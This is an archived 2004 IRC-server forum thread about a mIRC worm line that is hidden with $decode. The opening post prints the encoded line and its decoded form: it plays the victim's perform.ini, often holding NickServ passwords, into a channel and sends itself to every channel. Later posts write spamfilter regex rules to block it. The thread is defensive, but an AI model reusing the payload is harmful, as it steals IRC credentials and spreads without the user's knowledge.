mIRC $decode exploit

These are old archives. They are kept for historic purposes only.
Stealth
Head of Support
Posts: 2086
Joined: Tue Jun 15, 2004 8:50 pm
Location: Chino Hills, CA, US
Contact:

mIRC $decode exploit

Post by Stealth » Mon Jun 21, 2004 3:56 am

The newest form of exploit for mIRC uses $decode.

This exploit is seen as lines that look like this:

Code: Select all

LOL! //echo -a $($decode(JGZpbmRmaWxlKC4sKiwxLHNjaWQgLWF0MSAuYW1zZyBMT0whICQhY2IoMSkgfCAucGxheSAj/SBwZXJmb3JtLmluaSk=,m),2)
Which when echoed, does this:

Code: Select all

//echo -a $findfile(.,*,1,scid -at1 .amsg LOL! $!cb(1) | .play <some channel> perform.ini)
This makes the persons perform.ini file visible to whoever is on the channel it is played to. Since alot of people use perform for identifying, this makes takeovers and such extremely easy. Along with that, it messages itself to all the channels you are on, on all the servers you are connected to. All the user sees is the first file in his/her mIRC folder Windows tells it. The rest are done as "silent" commands.

Not too good with regex, but here is a try:

Code: Select all

spamfilter {
	regex ".* //echo -a \$\(\$decode\(.*,m\),[0-9]\);"
	target channel;
	action block;
	reason "$decode exploit";
};

aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight » Mon Jun 21, 2004 2:46 pm

While I would agree with blocking any and all forms of $decode (if you want to send a file like that, use DCC), I think this regex would be good for blocking this specific exploit:

Code: Select all

^LOL! //echo -a \$(\$decode(.+,m),[0-9])$
(?: are the \'s necessary here? I blame .NET for making me think they are :P )

codemastr
Former UnrealIRCd head coder
Posts: 811
Joined: Sat Mar 06, 2004 8:47 pm
Location: United States
Contact:

Post by codemastr » Mon Jun 21, 2004 6:16 pm

You need the \ for ( and ), but not for $. () are metacharacters for grouping. The $ doesn't need it because the $ only has meaning at the end of a (sub)expression.
-- codemastr

Stealth
Head of Support
Posts: 2086
Joined: Tue Jun 15, 2004 8:50 pm
Location: Chino Hills, CA, US
Contact:

Post by Stealth » Mon Jun 21, 2004 9:40 pm

I think having .* at the beginnging is a good thing though, since it can have anything there to attract attention.

This does not block all of $decode, because of the $( in front of it. The $( tells mIRC to re-evauluate the output of $decode.

I have also noticed that the echo may have either of these swithces: a (active window) or s (status window)

From what everyone is saying, this regex should match it well enough:

Code: Select all

//echo -[as] $\($decode\(.+,m\),[0-9]\)

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop » Tue Jun 22, 2004 1:34 am

I've added the following sig to CVS:

Code: Select all

spamfilter {
        regex "^LOL! //echo -a \$\(\$decode\(.+,m\),[0-9]\)$";
        target channel;
        reason "$decode exploit";
        action block;
};
Without escaping the $'s it didn't work here btw ;p.

Gilou
Posts: 3
Joined: Wed Jun 30, 2004 8:45 am
Location: Pornichet, France
Contact:

noobs net

Post by Gilou » Wed Jun 30, 2004 8:53 am

Hi ;)
Actually, the arrival of these bots also let us see (admin) that a lot of noobs were pasting the $decode thing, whatever it might contain, so, may it be paranoia, we decided to block $decode (with a terrible wildcarding), as it's quite useless, and if it does not damage anything, it's quite annoying running after noobs who lets stupid $decode things spread ...
TA GUEULE !

Terantula

I agree, $decode is useless...

Post by Terantula » Fri Jul 16, 2004 5:16 pm

... as I have never used it as a user in the years I have been chatting, so I have to agree with Gilou on this, blocking the use of the $decode is not a loss, but a fix to an long existing problem.

I put this spamfilter into my IRCd ASAP.

spamfilter {
regex ".*\$decode\.*";
target channel;
action block;
reason "$decode commands are not permitted on this server.";
};

I dont know anapple from regcode, so I hope this works... :)

aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight » Fri Jul 16, 2004 11:03 pm

just $decode by itself is enough...

and you might want to block $encode while you're at it :P

Guest

Post by Guest » Mon Jul 19, 2004 8:14 pm

Why? $encode cant be used for that type of exploit. It can create them, but it never gets said on the server...

w00t
Posts: 1136
Joined: Thu Mar 25, 2004 3:31 am
Location: Nowra, Australia

Post by w00t » Mon Jul 19, 2004 11:27 pm

Unless it's been escaped.
-ChatSpike IRC Network [http://www.chatspike.net]
-Denora Stats [http://denora.nomadirc.net]
-Omerta [http://www.barafranca.com]

Jason
Posts: 570
Joined: Mon Jun 14, 2004 5:09 pm

Post by Jason » Tue Jul 20, 2004 12:10 am

Claims Guest Post Above


But that would only be a mistake. And isnt automatically for creating exploits, so a spamfilter GLINE etc on it wouldnt be good (I $encode my passwords in my connect script to prevent accidental showing to the person behind me. I certainly wouldnt want to be glined for accidentally missing a / on my //echo $encode(pass))
Why the hell can't my signature be empty?
"Your message contains too few characters."

aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight » Wed Jul 21, 2004 12:55 am

Jason wrote:I certainly wouldnt want to be glined for accidentally missing a / on my //echo $encode(pass))
/echo doesn't even send to the server...

(Off-topic mIRC trick: hit tab after typing an identifier to evaluate it right then and there - only works on the command line (not in the script editor). :) )

Jason
Posts: 570
Joined: Mon Jun 14, 2004 5:09 pm

Post by Jason » Thu Jul 22, 2004 12:40 am

Oops, Just trying to make an example! Hows this:

//msg $me $encode(pass)
Why the hell can't my signature be empty?
"Your message contains too few characters."

aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight » Thu Jul 22, 2004 4:00 am

Well, /msg NickServ $encode(pass) would be a better example, but I personally use /nickserv :P .

Jason
Posts: 570
Joined: Mon Jun 14, 2004 5:09 pm

Post by Jason » Thu Jul 22, 2004 4:05 am

$decode you mean, when actually sending it, you would want to decode, not encode
Why the hell can't my signature be empty?
"Your message contains too few characters."

Post Reply